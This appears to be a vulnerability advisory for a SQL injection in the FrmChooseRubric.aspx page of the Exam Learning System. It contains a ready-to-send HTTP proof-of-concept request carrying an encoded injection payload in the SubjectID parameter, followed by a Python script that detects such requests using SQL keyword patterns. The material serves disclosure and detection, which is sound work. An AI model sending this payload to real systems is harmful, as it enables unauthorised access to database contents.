Exam Learning System (考试学习系统) FrmChooseRubric.aspx SQL Injection

Date: 2025-08-20 | Affected software: Exam Learning System (考试学习系统) | PoC: public

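Vulnerability description

FrmChooseRubric.aspx in the Exam Learning System (考试学习系统) contains a SQL injection vulnerability that an attacker can exploit to obtain sensitive information from the database.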

PoC code

GET /WorkExam/FrmChooseRubric.aspx?Num=-1&RubricID=-1&SubjectID=%27%29%20AND%202075%20IN%20%28SELECT%20%28CHAR%28113%29%2BCHAR%2898%29%2BCHAR%28107%29%2BCHAR%28120%29%2BCHAR%28113%29%2B%28SELECT%20%28CASE%20WHEN%20%282075%3D2075%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%28113%29%2BCHAR%28107%29%2BCHAR%28113%29%2BCHAR%2898%29%2BCHAR%28113%29%29%29--%20gmIb HTTP/1.1
Host: 
Accept: */*
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: ExamUserCode=1; ExamUserName=1; ExamDeptName=1; ExamDeptID=1;  ExamUserLevel=1;
User-Agent: Opera/9.30.(Windows NT 5.01; th-TH) Presto/2.9.174 Version/10.00
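
Detection sketch for requests shaped like the PoC above, as an added example that is not part of the original advisory or the vendor's code. It takes raw HTTP request lines, decodes the three query parameters seen in the PoC, and flags values that are not plain integers; the assumption that legitimate values are integers or comma-separated integer lists is not stated on the page, and the function name `inspect` and the sample lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Path and parameter names come from the PoC request; ASP.NET on IIS treats
# both case-insensitively, so everything is compared in lower case.
TARGET_PATH = "/workexam/frmchooserubric.aspx"
WATCHED = {"num", "rubricid", "subjectid"}

# Assumption (not stated on the page): legitimate values are integers or
# comma-separated integer lists such as "5,7".
BENIGN = re.compile(r"-?\d+(,-?\d+)*")
SQL_TOKENS = re.compile(
    r"'|--|/\*|;|\b(select|union|case|char|cast|convert|exec|waitfor)\b", re.I)


def inspect(request_line):
    """Return [(param, reason), ...] for one HTTP request line."""
    fields = request_line.strip().split(" ")
    if len(fields) < 3:
        return []
    # Rejoin in case the target contains unencoded spaces.
    target = urlsplit(" ".join(fields[1:-1]))
    if target.path.lower() != TARGET_PATH:
        return []
    findings = []
    # parse_qs percent-decodes, so %27 and %2B are seen as ' and +.
    for name, values in parse_qs(target.query, keep_blank_values=True).items():
        if name.lower() not in WATCHED:
            continue
        for value in values:
            if BENIGN.fullmatch(value):
                continue
            reason = "sql-token" if SQL_TOKENS.search(value) else "non-numeric"
            findings.append((name.lower(), reason))
    return findings


# Constructed sample request lines (not captured traffic).
SAMPLES = [
    "GET /WorkExam/FrmChooseRubric.aspx?Num=10&RubricID=3&SubjectID=5,7 HTTP/1.1",
    "GET /WorkExam/FrmChooseRubric.aspx?Num=-1&RubricID=-1&SubjectID="
    "%27%29%20AND%202075%20IN%20%28SELECT%20CHAR%28113%29%29--%20x HTTP/1.1",
    "GET /WorkExam/FrmChooseRubric.aspx?Num=1&RubricID=1&SubjectID=abc HTTP/1.1",
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(inspect(line) or "clean", "<-", line[:60])
```

If the application legitimately accepts non-numeric SubjectID values, relax `BENIGN` accordingly and rely on the `sql-token` findings only.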
